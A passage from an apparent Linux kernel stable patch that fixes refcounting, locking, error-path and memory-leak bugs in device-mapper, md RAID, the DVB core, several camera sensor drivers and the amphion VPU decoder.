++		r = bd_link_disk_holder(bdev, md->disk);
++		if (r)
++			goto out_blkdev_put;
+ 	}
+ 
++	td->dm_dev.mode = mode;
+ 	td->dm_dev.bdev = bdev;
+ 	td->dm_dev.dax_dev = fs_dax_get_by_bdev(bdev, &part_off, NULL, NULL);
+-	return 0;
++	format_dev_t(td->dm_dev.name, dev);
++	list_add(&td->list, &md->table_devices);
++	return td;
++
++out_blkdev_put:
++	blkdev_put(bdev, mode | FMODE_EXCL);
++out_free_td:
++	kfree(td);
++	return ERR_PTR(r);
+ }
+ 
+ /*
+@@ -761,14 +781,12 @@ static int open_table_device(struct table_device *td, dev_t dev,
+  */
+ static void close_table_device(struct table_device *td, struct mapped_device *md)
+ {
+-	if (!td->dm_dev.bdev)
+-		return;
+-
+-	bd_unlink_disk_holder(td->dm_dev.bdev, dm_disk(md));
++	if (md->disk->slave_dir)
++		bd_unlink_disk_holder(td->dm_dev.bdev, md->disk);
+ 	blkdev_put(td->dm_dev.bdev, td->dm_dev.mode | FMODE_EXCL);
+ 	put_dax(td->dm_dev.dax_dev);
+-	td->dm_dev.bdev = NULL;
+-	td->dm_dev.dax_dev = NULL;
++	list_del(&td->list);
++	kfree(td);
+ }
+ 
+ static struct table_device *find_table_device(struct list_head *l, dev_t dev,
+@@ -786,31 +804,16 @@ static struct table_device *find_table_device(struct list_head *l, dev_t dev,
+ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ 			struct dm_dev **result)
+ {
+-	int r;
+ 	struct table_device *td;
+ 
+ 	mutex_lock(&md->table_devices_lock);
+ 	td = find_table_device(&md->table_devices, dev, mode);
+ 	if (!td) {
+-		td = kmalloc_node(sizeof(*td), GFP_KERNEL, md->numa_node_id);
+-		if (!td) {
++		td = open_table_device(md, dev, mode);
++		if (IS_ERR(td)) {
+ 			mutex_unlock(&md->table_devices_lock);
+-			return -ENOMEM;
++			return PTR_ERR(td);
+ 		}
+-
+-		td->dm_dev.mode = mode;
+-		td->dm_dev.bdev = NULL;
+-
+-		if ((r = open_table_device(td, dev, md))) {
+-			mutex_unlock(&md->table_devices_lock);
+-			kfree(td);
+-			return r;
+-		}
+-
+-		format_dev_t(td->dm_dev.name, dev);
+-
+-		refcount_set(&td->count, 1);
+-		list_add(&td->list, &md->table_devices);
+ 	} else {
+ 		refcount_inc(&td->count);
+ 	}
+@@ -825,11 +828,8 @@ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d)
+ 	struct table_device *td = container_of(d, struct table_device, dm_dev);
+ 
+ 	mutex_lock(&md->table_devices_lock);
+-	if (refcount_dec_and_test(&td->count)) {
++	if (refcount_dec_and_test(&td->count))
+ 		close_table_device(td, md);
+-		list_del(&td->list);
+-		kfree(td);
+-	}
+ 	mutex_unlock(&md->table_devices_lock);
+ }
+ 
+@@ -1972,8 +1972,21 @@ static void cleanup_mapped_device(struct mapped_device *md)
+ 		md->disk->private_data = NULL;
+ 		spin_unlock(&_minor_lock);
+ 		if (dm_get_md_type(md) != DM_TYPE_NONE) {
++			struct table_device *td;
++
+ 			dm_sysfs_exit(md);
++			list_for_each_entry(td, &md->table_devices, list) {
++				bd_unlink_disk_holder(td->dm_dev.bdev,
++						      md->disk);
++			}
++
++			/*
++			 * Hold lock to make sure del_gendisk() won't concurrent
++			 * with open/close_table_device().
++			 */
++			mutex_lock(&md->table_devices_lock);
+ 			del_gendisk(md->disk);
++			mutex_unlock(&md->table_devices_lock);
+ 		}
+ 		dm_queue_destroy_crypto_profile(md->queue);
+ 		put_disk(md->disk);
+@@ -2305,6 +2318,7 @@ int dm_setup_md_queue(struct mapped_device *md, struct dm_table *t)
+ {
+ 	enum dm_queue_mode type = dm_table_get_type(t);
+ 	struct queue_limits limits;
++	struct table_device *td;
+ 	int r;
+ 
+ 	switch (type) {
+@@ -2333,17 +2347,40 @@ int dm_setup_md_queue(struct mapped_device *md, struct dm_table *t)
+ 	if (r)
+ 		return r;
+ 
++	/*
++	 * Hold lock to make sure add_disk() and del_gendisk() won't concurrent
++	 * with open_table_device() and close_table_device().
++	 */
++	mutex_lock(&md->table_devices_lock);
+ 	r = add_disk(md->disk);
++	mutex_unlock(&md->table_devices_lock);
+ 	if (r)
+ 		return r;
+ 
+-	r = dm_sysfs_init(md);
+-	if (r) {
+-		del_gendisk(md->disk);
+-		return r;
++	/*
++	 * Register the holder relationship for devices added before the disk
++	 * was live.
++	 */
++	list_for_each_entry(td, &md->table_devices, list) {
++		r = bd_link_disk_holder(td->dm_dev.bdev, md->disk);
++		if (r)
++			goto out_undo_holders;
+ 	}
++
++	r = dm_sysfs_init(md);
++	if (r)
++		goto out_undo_holders;
++
+ 	md->type = type;
+ 	return 0;
++
++out_undo_holders:
++	list_for_each_entry_continue_reverse(td, &md->table_devices, list)
++		bd_unlink_disk_holder(td->dm_dev.bdev, md->disk);
++	mutex_lock(&md->table_devices_lock);
++	del_gendisk(md->disk);
++	mutex_unlock(&md->table_devices_lock);
++	return r;
+ }
+ 
+ struct mapped_device *dm_get_md(dev_t dev)
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index bf6dffadbe6f6..63ece30114e53 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -2195,20 +2195,23 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 
+ 		if (set) {
+ 			bmc_new = md_bitmap_get_counter(&bitmap->counts, block, &new_blocks, 1);
+-			if (*bmc_new == 0) {
+-				/* need to set on-disk bits too. */
+-				sector_t end = block + new_blocks;
+-				sector_t start = block >> chunkshift;
+-				start <<= chunkshift;
+-				while (start < end) {
+-					md_bitmap_file_set_bit(bitmap, block);
+-					start += 1 << chunkshift;
++			if (bmc_new) {
++				if (*bmc_new == 0) {
++					/* need to set on-disk bits too. */
++					sector_t end = block + new_blocks;
++					sector_t start = block >> chunkshift;
++
++					start <<= chunkshift;
++					while (start < end) {
++						md_bitmap_file_set_bit(bitmap, block);
++						start += 1 << chunkshift;
++					}
++					*bmc_new = 2;
++					md_bitmap_count_page(&bitmap->counts, block, 1);
++					md_bitmap_set_pending(&bitmap->counts, block);
+ 				}
+-				*bmc_new = 2;
+-				md_bitmap_count_page(&bitmap->counts, block, 1);
+-				md_bitmap_set_pending(&bitmap->counts, block);
++				*bmc_new |= NEEDED_MASK;
+ 			}
+-			*bmc_new |= NEEDED_MASK;
+ 			if (new_blocks < old_blocks)
+ 				old_blocks = new_blocks;
+ 		}
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index 857c49399c28e..b536befd88988 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -398,7 +398,6 @@ static int raid0_run(struct mddev *mddev)
+ 
+ 		blk_queue_max_hw_sectors(mddev->queue, mddev->chunk_sectors);
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, mddev->chunk_sectors);
+-		blk_queue_max_discard_sectors(mddev->queue, UINT_MAX);
+ 
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+ 		blk_queue_io_opt(mddev->queue,
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 05d8438cfec88..58f705f429480 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -3159,6 +3159,7 @@ static int raid1_run(struct mddev *mddev)
+ 	 * RAID1 needs at least one disk in active
+ 	 */
+ 	if (conf->raid_disks - mddev->degraded < 1) {
++		md_unregister_thread(&conf->thread);
+ 		ret = -EINVAL;
+ 		goto abort;
+ 	}
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 3aa8b6e11d585..9a6503f5cb982 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -4145,8 +4145,6 @@ static int raid10_run(struct mddev *mddev)
+ 	conf->thread = NULL;
+ 
+ 	if (mddev->queue) {
+-		blk_queue_max_discard_sectors(mddev->queue,
+-					      UINT_MAX);
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+ 		raid10_set_io_opt(conf);
+diff --git a/drivers/media/dvb-core/dvb_ca_en50221.c b/drivers/media/dvb-core/dvb_ca_en50221.c
+index 15a08d8c69ef8..c2d2792227f86 100644
+--- a/drivers/media/dvb-core/dvb_ca_en50221.c
++++ b/drivers/media/dvb-core/dvb_ca_en50221.c
+@@ -157,7 +157,7 @@ static void dvb_ca_private_free(struct dvb_ca_private *ca)
+ {
+ 	unsigned int i;
+ 
+-	dvb_free_device(ca->dvbdev);
++	dvb_device_put(ca->dvbdev);
+ 	for (i = 0; i < ca->slot_count; i++)
+ 		vfree(ca->slot_info[i].rx_buffer.data);
+ 
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index 48e735cdbe6bb..c41a7e5c2b928 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -136,7 +136,7 @@ static void __dvb_frontend_free(struct dvb_frontend *fe)
+ 	struct dvb_frontend_private *fepriv = fe->frontend_priv;
+ 
+ 	if (fepriv)
+-		dvb_free_device(fepriv->dvbdev);
++		dvb_device_put(fepriv->dvbdev);
+ 
+ 	dvb_frontend_invoke_release(fe, fe->ops.release);
+ 
+@@ -2986,6 +2986,7 @@ int dvb_register_frontend(struct dvb_adapter *dvb,
+ 		.name = fe->ops.info.name,
+ #endif
+ 	};
++	int ret;
+ 
+ 	dev_dbg(dvb->device, "%s:\n", __func__);
+ 
+@@ -3019,8 +3020,13 @@ int dvb_register_frontend(struct dvb_adapter *dvb,
+ 		 "DVB: registering adapter %i frontend %i (%s)...\n",
+ 		 fe->dvb->num, fe->id, fe->ops.info.name);
+ 
+-	dvb_register_device(fe->dvb, &fepriv->dvbdev, &dvbdev_template,
++	ret = dvb_register_device(fe->dvb, &fepriv->dvbdev, &dvbdev_template,
+ 			    fe, DVB_DEVICE_FRONTEND, 0);
++	if (ret) {
++		dvb_frontend_put(fe);
++		mutex_unlock(&frontend_mutex);
++		return ret;
++	}
+ 
+ 	/*
+ 	 * Initialize the cache to the proper values according with the
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 675d877a67b25..9934728734af9 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -97,7 +97,7 @@ static int dvb_device_open(struct inode *inode, struct file *file)
+ 		new_fops = fops_get(dvbdev->fops);
+ 		if (!new_fops)
+ 			goto fail;
+-		file->private_data = dvbdev;
++		file->private_data = dvb_device_get(dvbdev);
+ 		replace_fops(file, new_fops);
+ 		if (file->f_op->open)
+ 			err = file->f_op->open(inode, file);
+@@ -161,6 +161,9 @@ int dvb_generic_release(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	dvbdev->users++;
++
++	dvb_device_put(dvbdev);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL(dvb_generic_release);
+@@ -478,6 +481,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	}
+ 
+ 	memcpy(dvbdev, template, sizeof(struct dvb_device));
++	kref_init(&dvbdev->ref);
+ 	dvbdev->type = type;
+ 	dvbdev->id = id;
+ 	dvbdev->adapter = adap;
+@@ -508,7 +512,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ #endif
+ 
+ 	dvbdev->minor = minor;
+-	dvb_minors[minor] = dvbdev;
++	dvb_minors[minor] = dvb_device_get(dvbdev);
+ 	up_write(&minor_rwsem);
+ 
+ 	ret = dvb_register_media_device(dvbdev, type, minor, demux_sink_pads);
+@@ -553,6 +557,7 @@ void dvb_remove_device(struct dvb_device *dvbdev)
+ 
+ 	down_write(&minor_rwsem);
+ 	dvb_minors[dvbdev->minor] = NULL;
++	dvb_device_put(dvbdev);
+ 	up_write(&minor_rwsem);
+ 
+ 	dvb_media_device_free(dvbdev);
+@@ -564,21 +569,34 @@ void dvb_remove_device(struct dvb_device *dvbdev)
+ EXPORT_SYMBOL(dvb_remove_device);
+ 
+ 
+-void dvb_free_device(struct dvb_device *dvbdev)
++static void dvb_free_device(struct kref *ref)
+ {
+-	if (!dvbdev)
+-		return;
++	struct dvb_device *dvbdev = container_of(ref, struct dvb_device, ref);
+ 
+ 	kfree (dvbdev->fops);
+ 	kfree (dvbdev);
+ }
+-EXPORT_SYMBOL(dvb_free_device);
++
++
++struct dvb_device *dvb_device_get(struct dvb_device *dvbdev)
++{
++	kref_get(&dvbdev->ref);
++	return dvbdev;
++}
++EXPORT_SYMBOL(dvb_device_get);
++
++
++void dvb_device_put(struct dvb_device *dvbdev)
++{
++	if (dvbdev)
++		kref_put(&dvbdev->ref, dvb_free_device);
++}
+ 
+ 
+ void dvb_unregister_device(struct dvb_device *dvbdev)
+ {
+ 	dvb_remove_device(dvbdev);
+-	dvb_free_device(dvbdev);
++	dvb_device_put(dvbdev);
+ }
+ EXPORT_SYMBOL(dvb_unregister_device);
+ 
+diff --git a/drivers/media/dvb-frontends/bcm3510.c b/drivers/media/dvb-frontends/bcm3510.c
+index da0ff7b44da41..68b92b4419cff 100644
+--- a/drivers/media/dvb-frontends/bcm3510.c
++++ b/drivers/media/dvb-frontends/bcm3510.c
+@@ -649,6 +649,7 @@ static int bcm3510_download_firmware(struct dvb_frontend* fe)
+ 		deb_info("firmware chunk, addr: 0x%04x, len: 0x%04x, total length: 0x%04zx\n",addr,len,fw->size);
+ 		if ((ret = bcm3510_write_ram(st,addr,&b[i+4],len)) < 0) {
+ 			err("firmware download failed: %d\n",ret);
++			release_firmware(fw);
+ 			return ret;
+ 		}
+ 		i += 4 + len;
+diff --git a/drivers/media/i2c/ad5820.c b/drivers/media/i2c/ad5820.c
+index 516de278cc493..a12fedcc3a1ce 100644
+--- a/drivers/media/i2c/ad5820.c
++++ b/drivers/media/i2c/ad5820.c
+@@ -327,18 +327,18 @@ static int ad5820_probe(struct i2c_client *client,
+ 
+ 	ret = media_entity_pads_init(&coil->subdev.entity, 0, NULL);
+ 	if (ret < 0)
+-		goto cleanup2;
++		goto clean_mutex;
+ 
+ 	ret = v4l2_async_register_subdev(&coil->subdev);
+ 	if (ret < 0)
+-		goto cleanup;
++		goto clean_entity;
+ 
+ 	return ret;
+ 
+-cleanup2:
+-	mutex_destroy(&coil->power_lock);
+-cleanup:
++clean_entity:
+ 	media_entity_cleanup(&coil->subdev.entity);
++clean_mutex:
++	mutex_destroy(&coil->power_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/i2c/adv748x/adv748x-afe.c b/drivers/media/i2c/adv748x/adv748x-afe.c
+index 02eabe10ab970..00095c7762c24 100644
+--- a/drivers/media/i2c/adv748x/adv748x-afe.c
++++ b/drivers/media/i2c/adv748x/adv748x-afe.c
+@@ -521,6 +521,10 @@ int adv748x_afe_init(struct adv748x_afe *afe)
+ 		}
+ 	}
+ 
++	adv748x_afe_s_input(afe, afe->input);
++
++	adv_dbg(state, "AFE Default input set to %d\n", afe->input);
++
+ 	/* Entity pads and sinks are 0-indexed to match the pads */
+ 	for (i = ADV748X_AFE_SINK_AIN0; i <= ADV748X_AFE_SINK_AIN7; i++)
+ 		afe->pads[i].flags = MEDIA_PAD_FL_SINK;
+diff --git a/drivers/media/i2c/dw9768.c b/drivers/media/i2c/dw9768.c
+index 0f47ef015a1d3..83a3ee275bbe8 100644
+--- a/drivers/media/i2c/dw9768.c
++++ b/drivers/media/i2c/dw9768.c
+@@ -414,6 +414,7 @@ static int dw9768_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct dw9768 *dw9768;
++	bool full_power;
+ 	unsigned int i;
+ 	int ret;
+ 
+@@ -469,13 +470,23 @@ static int dw9768_probe(struct i2c_client *client)
+ 
+ 	dw9768->sd.entity.function = MEDIA_ENT_F_LENS;
+ 
++	/*
++	 * Figure out whether we're going to power up the device here. Generally
++	 * this is done if CONFIG_PM is disabled in a DT system or the device is
++	 * to be powered on in an ACPI system. Similarly for power off in
++	 * remove.
++	 */
+ 	pm_runtime_enable(dev);
+-	if (!pm_runtime_enabled(dev)) {
++	full_power = (is_acpi_node(dev_fwnode(dev)) &&
++		      acpi_dev_state_d0(dev)) ||
++		     (is_of_node(dev_fwnode(dev)) && !pm_runtime_enabled(dev));
++	if (full_power) {
+ 		ret = dw9768_runtime_resume(dev);
+ 		if (ret < 0) {
+ 			dev_err(dev, "failed to power on: %d\n", ret);
+ 			goto err_clean_entity;
+ 		}
++		pm_runtime_set_active(dev);
+ 	}
+ 
+ 	ret = v4l2_async_register_subdev(&dw9768->sd);
+@@ -484,14 +495,17 @@ static int dw9768_probe(struct i2c_client *client)
+ 		goto err_power_off;
+ 	}
+ 
++	pm_runtime_idle(dev);
++
+ 	return 0;
+ 
+ err_power_off:
+-	if (pm_runtime_enabled(dev))
+-		pm_runtime_disable(dev);
+-	else
++	if (full_power) {
+ 		dw9768_runtime_suspend(dev);
++		pm_runtime_set_suspended(dev);
++	}
+ err_clean_entity:
++	pm_runtime_disable(dev);
+ 	media_entity_cleanup(&dw9768->sd.entity);
+ err_free_handler:
+ 	v4l2_ctrl_handler_free(&dw9768->ctrls);
+@@ -503,14 +517,17 @@ static void dw9768_remove(struct i2c_client *client)
+ {
+ 	struct v4l2_subdev *sd = i2c_get_clientdata(client);
+ 	struct dw9768 *dw9768 = sd_to_dw9768(sd);
++	struct device *dev = &client->dev;
+ 
+ 	v4l2_async_unregister_subdev(&dw9768->sd);
+ 	v4l2_ctrl_handler_free(&dw9768->ctrls);
+ 	media_entity_cleanup(&dw9768->sd.entity);
+-	pm_runtime_disable(&client->dev);
+-	if (!pm_runtime_status_suspended(&client->dev))
+-		dw9768_runtime_suspend(&client->dev);
+-	pm_runtime_set_suspended(&client->dev);
++	if ((is_acpi_node(dev_fwnode(dev)) && acpi_dev_state_d0(dev)) ||
++	    (is_of_node(dev_fwnode(dev)) && !pm_runtime_enabled(dev))) {
++		dw9768_runtime_suspend(dev);
++		pm_runtime_set_suspended(dev);
++	}
++	pm_runtime_disable(dev);
+ }
+ 
+ static const struct of_device_id dw9768_of_table[] = {
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index c5b69823f257e..7c61873b71981 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -2008,22 +2008,24 @@ static int hi846_parse_dt(struct hi846 *hi846, struct device *dev)
+ 	    bus_cfg.bus.mipi_csi2.num_data_lanes != 4) {
+ 		dev_err(dev, "number of CSI2 data lanes %d is not supported",
+ 			bus_cfg.bus.mipi_csi2.num_data_lanes);
+-		v4l2_fwnode_endpoint_free(&bus_cfg);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	hi846->nr_lanes = bus_cfg.bus.mipi_csi2.num_data_lanes;
+ 
+ 	if (!bus_cfg.nr_of_link_frequencies) {
+ 		dev_err(dev, "link-frequency property not found in DT\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	/* Check that link frequences for all the modes are in device tree */
+ 	fq = hi846_check_link_freqs(hi846, &bus_cfg);
+ 	if (fq) {
+ 		dev_err(dev, "Link frequency of %lld is not supported\n", fq);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	v4l2_fwnode_endpoint_free(&bus_cfg);
+@@ -2044,6 +2046,10 @@ static int hi846_parse_dt(struct hi846 *hi846, struct device *dev)
+ 	}
+ 
+ 	return 0;
++
++check_hwcfg_error:
++	v4l2_fwnode_endpoint_free(&bus_cfg);
++	return ret;
+ }
+ 
+ static int hi846_probe(struct i2c_client *client)
+diff --git a/drivers/media/i2c/mt9p031.c b/drivers/media/i2c/mt9p031.c
+index 45f7b5e52bc39..b69db6fc82618 100644
+--- a/drivers/media/i2c/mt9p031.c
++++ b/drivers/media/i2c/mt9p031.c
+@@ -702,7 +702,6 @@ static int mt9p031_init_cfg(struct v4l2_subdev *subdev,
+ 					     V4L2_SUBDEV_FORMAT_TRY;
+ 
+ 	crop = __mt9p031_get_pad_crop(mt9p031, sd_state, 0, which);
+-	v4l2_subdev_get_try_crop(subdev, sd_state, 0);
+ 	crop->left = MT9P031_COLUMN_START_DEF;
+ 	crop->top = MT9P031_ROW_START_DEF;
+ 	crop->width = MT9P031_WINDOW_WIDTH_DEF;
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 2d740397a5d4d..3f6d715efa823 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3817,7 +3817,8 @@ static int ov5640_probe(struct i2c_client *client)
+ 	sensor->current_mode =
+ 		&ov5640_mode_data[OV5640_MODE_VGA_640_480];
+ 	sensor->last_mode = sensor->current_mode;
+-	sensor->current_link_freq = OV5640_DEFAULT_LINK_FREQ;
++	sensor->current_link_freq =
++		ov5640_csi2_link_freqs[OV5640_DEFAULT_LINK_FREQ];
+ 
+ 	sensor->ae_target = 52;
+ 
+diff --git a/drivers/media/i2c/ov5648.c b/drivers/media/i2c/ov5648.c
+index 84604ea7bdf9e..17465fcf28e33 100644
+--- a/drivers/media/i2c/ov5648.c
++++ b/drivers/media/i2c/ov5648.c
+@@ -2597,6 +2597,7 @@ static void ov5648_remove(struct i2c_client *client)
+ 	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ 	mutex_destroy(&sensor->mutex);
+ 	media_entity_cleanup(&subdev->entity);
++	v4l2_fwnode_endpoint_free(&sensor->endpoint);
+ }
+ 
+ static const struct dev_pm_ops ov5648_pm_ops = {
+diff --git a/drivers/media/pci/saa7164/saa7164-core.c b/drivers/media/pci/saa7164/saa7164-core.c
+index d5f32e3ff5441..754c8be1b6d8b 100644
+--- a/drivers/media/pci/saa7164/saa7164-core.c
++++ b/drivers/media/pci/saa7164/saa7164-core.c
+@@ -1259,7 +1259,7 @@ static int saa7164_initdev(struct pci_dev *pci_dev,
+ 
+ 	if (saa7164_dev_setup(dev) < 0) {
+ 		err = -EINVAL;
+-		goto fail_free;
++		goto fail_dev;
+ 	}
+ 
+ 	/* print pci info */
+@@ -1427,6 +1427,8 @@ fail_fw:
+ 
+ fail_irq:
+ 	saa7164_dev_unregister(dev);
++fail_dev:
++	pci_disable_device(pci_dev);
+ fail_free:
+ 	v4l2_device_unregister(&dev->v4l2_dev);
+ 	kfree(dev);
+diff --git a/drivers/media/pci/solo6x10/solo6x10-core.c b/drivers/media/pci/solo6x10/solo6x10-core.c
+index 4a546eeefe38f..6d87fbb0ee04a 100644
+--- a/drivers/media/pci/solo6x10/solo6x10-core.c
++++ b/drivers/media/pci/solo6x10/solo6x10-core.c
+@@ -420,6 +420,7 @@ static int solo_sysfs_init(struct solo_dev *solo_dev)
+ 		     solo_dev->nr_chans);
+ 
+ 	if (device_register(dev)) {
++		put_device(dev);
+ 		dev->parent = NULL;
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index feb75dc204de8..b27e6bed85f0f 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -286,6 +286,7 @@ static int vdec_g_fmt(struct file *file, void *fh, struct v4l2_format *f)
+ 	struct vpu_format *cur_fmt;
+ 	int i;
+ 
++	vpu_inst_lock(inst);
+ 	cur_fmt = vpu_get_format(inst, f->type);
+ 
+ 	pixmp->pixelformat = cur_fmt->pixfmt;
+@@ -303,6 +304,7 @@ static int vdec_g_fmt(struct file *file, void *fh, struct v4l2_format *f)
+ 	f->fmt.pix_mp.xfer_func = vdec->codec_info.transfer_chars;
+ 	f->fmt.pix_mp.ycbcr_enc = vdec->codec_info.matrix_coeffs;
+ 	f->fmt.pix_mp.quantization = vdec->codec_info.full_range;
++	vpu_inst_unlock(inst);
+ 
+ 	return 0;
+ }
+@@ -753,6 +755,9 @@ static bool vdec_check_source_change(struct vpu_inst *inst)
+ 	if (!inst->fh.m2m_ctx)
+ 		return false;
+ 
++	if (vdec->reset_codec)
++		return false;
++
+ 	if (!vb2_is_streaming(v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx)))
+ 		return true;
+ 	fmt = vpu_helper_find_format(inst, inst->cap_format.type, vdec->codec_info.pixfmt);
+@@ -1088,7 +1093,8 @@ static void vdec_event_seq_hdr(struct vpu_inst *inst, struct vpu_dec_codec_info
+ 		vdec->seq_tag = vdec->codec_info.tag;
+ 		if (vdec->is_source_changed) {
+ 			vdec_update_state(inst, VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE, 0);
+-			vpu_notify_source_change(inst);
++			vdec->source_change++;
++			vdec_handle_resolution_change(inst);
+ 			vdec->is_source_changed = false;
+ 		}
+ 	}
+@@ -1335,6 +1341,8 @@ static void vdec_abort(struct vpu_inst *inst)
+ 		  vdec->decoded_frame_count,
+ 		  vdec->display_frame_count,
+ 		  vdec->sequence);
++	if (!vdec->seq_hdr_found)
++		vdec->reset_codec = true;
+ 	vdec->params.end_flag = 0;
+ 	vdec->drain = 0;
+ 	vdec->params.frame_count = 0;
+@@ -1342,6 +1350,7 @@ static void vdec_abort(struct vpu_inst *inst)
+ 	vdec->display_frame_count = 0;
+ 	vdec->sequence = 0;
+ 	vdec->aborting = false;
++	inst->extra_size = 0;
+ }
+ 
+ static void vdec_stop(struct vpu_inst *inst, bool free)
+@@ -1464,8 +1473,7 @@ static int vdec_start_session(struct vpu_inst *inst, u32 type)
+ 	}
+ 
+ 	if (V4L2_TYPE_IS_OUTPUT(type)) {
+-		if (inst->state == VPU_CODEC_STATE_SEEK)
+-			vdec_update_state(inst, vdec->state, 1);
++		vdec_update_state(inst, vdec->state, 1);
+ 		vdec->eos_received = 0;
+ 		vpu_process_output_buffer(inst);
+ 	} else {
+@@ -1629,6 +1637,7 @@ static int vdec_open(struct file *file)
+ 		return ret;
+ 
+ 	vdec->fixed_fmt = false;
++	vdec->state = VPU_CODEC_STATE_ACTIVE;
+ 	inst->min_buffer_cap = VDEC_MIN_BUFFER_CAP;
+ 	inst->min_buffer_out = VDEC_MIN_BUFFER_OUT;
+ 	vdec_init(file);
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index beac0309ca8d9..048c23c2bf4db 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -13,6 +13,7 @@
+ #include <linux/mailbox_controller.h>
+ #include <linux/kfifo.h>
+ 
++#define VPU_TIMEOUT_WAKEUP	msecs_to_jiffies(200)
+ #define VPU_TIMEOUT		msecs_to_jiffies(1000)
+ #define VPU_INST_NULL_ID	(-1L)
+ #define VPU_MSG_BUFFER_SIZE	(8192)
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index f4d7ca78a6212..fa581ba6bab2d 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -269,7 +269,7 @@ exit:
+ 	return flag;
+ }
+ 
+-static int sync_session_response(struct vpu_inst *inst, unsigned long key)
++static int sync_session_response(struct vpu_inst *inst, unsigned long key, long timeout, int try)
+ {
+ 	struct vpu_core *core;
+ 
+@@ -279,10 +279,12 @@ static int sync_session_response(struct vpu_inst *inst, unsigned long key)
+ 	core = inst->core;
+ 
+ 	call_void_vop(inst, wait_prepare);
+-	wait_event_timeout(core->ack_wq, check_is_responsed(inst, key), VPU_TIMEOUT);
++	wait_event_timeout(core->ack_wq, check_is_responsed(inst, key), timeout);
+ 	call_void_vop(inst, wait_finish);
+ 
+ 	if (!check_is_responsed(inst, key)) {
++		if (try)
++			return -EINVAL;
+ 		dev_err(inst->dev, "[%d] sync session timeout\n", inst->id);
+ 		set_bit(inst->id, &core->hang_mask);
+ 		mutex_lock(&inst->core->cmd_lock);
+@@ -294,6 +296,19 @@ static int sync_session_response(struct vpu_inst *inst, unsigned long key)
+ 	return 0;
+ }
+ 
++static void vpu_core_keep_active(struct vpu_core *core)
++{
++	struct vpu_rpc_event pkt;
++
++	memset(&pkt, 0, sizeof(pkt));
++	vpu_iface_pack_cmd(core, &pkt, 0, VPU_CMD_ID_NOOP, NULL);
++
++	dev_dbg(core->dev, "try to wake up\n");
++	mutex_lock(&core->cmd_lock);
++	vpu_cmd_send(core, &pkt);
++	mutex_unlock(&core->cmd_lock);
++}
++
+ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ {
+ 	unsigned long key;
+@@ -304,9 +319,25 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ 		return -EINVAL;
+ 
+ 	ret = vpu_request_cmd(inst, id, data, &key, &sync);
+-	if (!ret && sync)
+-		ret = sync_session_response(inst, key);
++	if (ret)
++		goto exit;
++
++	/* workaround for a firmware issue,
++	 * firmware should be waked up by start or configure command,
++	 * but there is a very small change that firmware failed to wakeup.
++	 * in such case, try to wakeup firmware again by sending a noop command
++	 */
++	if (sync && (id == VPU_CMD_ID_CONFIGURE_CODEC || id == VPU_CMD_ID_START)) {
++		if (sync_session_response(inst, key, VPU_TIMEOUT_WAKEUP, 1))
++			vpu_core_keep_active(inst->core);
++		else
++			goto exit;
++	}
++
++	if (sync)
++		ret = sync_session_response(inst, key, VPU_TIMEOUT, 0);
+ 
++exit:
+ 	if (ret)
